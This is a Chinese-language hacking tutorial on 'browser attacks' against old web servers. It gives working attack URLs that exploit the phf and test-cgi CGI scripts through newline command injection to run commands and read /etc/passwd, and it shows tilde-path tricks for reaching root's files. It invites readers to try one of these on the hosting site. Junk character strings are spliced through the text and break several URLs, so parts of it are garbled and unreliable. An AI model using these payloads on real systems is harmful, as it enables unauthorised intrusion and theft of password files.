瀏覽器攻擊

在本章我將講述一些利用瀏覽器來進(jìn)行攻擊的方法
1。大家都知道了phf攻擊了，phf是cgi script,很多站點(diǎn)都有這個(gè)大漏洞啦，使用
http://thegnome.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd指令可以拿到那個(gè)站點(diǎn)的passwd.但還有些更好的執(zhí)行方法呦如：
http://thegnome.com/cgi-bin/phf?%0aid&Qalias=&Qname=haqr&Qemail=&Qnickna

4 x8 L; M2 x7 Y' k! N( c- _me=&Qoffice_phone=
. m0 x+ X2 C, Ghttp://thegnome.com/cgi-bin/phf?%0als%20-la%20%7Esomeuser&Qalias=&Qname=
haqr&Qemail=&Qnickname=&Qoffice_phone=
http://thegnome.com/cgi-bin/phf?%0acp%20/etc/passwd%20%7Esomeuser/passwd
%0A&Qalias=&Qname=haqr&Qemail=&Qnickname=&Qoffice_phone=
http://thegnome.com/~someuser/passwd
! J" Y1 c) F- I7 Q1 ahttp://thegnome.com/cgi-bin/phf?%0arm%20%7Esomeuser/passwd&Qalias=&Qname
& {. H8 A2 o; m; u$ }
! T1 K9 W* H) r9 b" N=haqr&Qemail=&Qnickname=&Qoffice_phone=
/ J+ {( l2 h; S1 }: U上面執(zhí)行的命令是
, X7 a* m( \; P9 Q- n5 X$ qid
ls -la ~someuser
cp /etc/passwd ~someuser/passwd
rm ~someuser/passwd
. n5 G9 y! v2 l7 i) r0 K. z/ p0 A
2。有關(guān)test攻擊
http://thegnome.com/cgi-bin/test-cgi?\whatever
服務(wù)器會(huì)應(yīng)答，本服務(wù)器的一些情況如：
CGI/1.0 test script report:

argc is 0. argv is .

, c& ?5 {& ?% B- {& q' V+ M' O: GSERVER_SOFTWARE = NCSA/1.4B
4 i7 S, Q- {0 H1 S5 ?6 s" ZSERVER_NAME = thegnome.com
GATEWAY_INTERFACE = CGI/1.1
SERVER_PROTOCOL = HTTP/1.0
2 M* z( r- z( I+ O- e5 |SERVER_PORT = 80
REQUEST_METHOD = GET
HTTP_ACCEPT = text/plain, application/x-html, application/html,
( l% \# i! q; d2 S5 i4 _text/html, text/x-html
PATH_INFO =
2 H- t' }2 w  {4 S9 H4 W, F. [PATH_TRANSLATED =
SCRIPT_NAME = /cgi-bin/test-cgi
/ X4 N: L8 T. n" @QUERY_STRING = whatever
REMOTE_HOST = fifth.column.gov
REMOTE_ADDR = 200.200.200.200
. C! `1 M( d5 XREMOTE_USER =
' t  W1 A# m  m( P3 W. rAUTH_TYPE =
CONTENT_TYPE =
CONTENT_LENGTH =
  z9 Y) C, V1 ]
好吧，讓我們來點(diǎn)趕興趣的
http://thegnome.com/cgi-bin/test-cgi?\help&0a/bin/cat%20/etc/passwd
: R+ o& A, G  m* m
. Q: P$ l* M* t% d: f3。~的應(yīng)用
~主要是用在很多的個(gè)人主頁(yè)上的快捷目錄的方法，如果我們使用這樣的~
0 Q( V4 y& j& e* p- Dhttp://thegnome.com/~root
( u. t  d0 g/ v6 T0 N% ehttp://thegnome.com/~root/etc/passwd
- \8 a2 n6 L% V. w% [/ U' ]# {2 U不是在任何平臺(tái)上都通過呦，在BSD Apache上曾經(jīng)成功過,當(dāng)然還可以試試~bin ,~etc,~uucp.....
5 F; I' E4 h2 n5 b% g- P看到這個(gè)站點(diǎn)了嗎，本站所在的這個(gè)站點(diǎn)就是用這種形式的，如果我們打入 本站所在的web地址/~bin
9 z! F* a! O4 w* y' ~* ~出現(xiàn)了什么，你看到了嗎？然后...............注意請(qǐng)不要破壞
$ A  h; ?5 V6 I3 w1 ~& L: d9 T
8 Z$ x4 N& [& P8 ?- q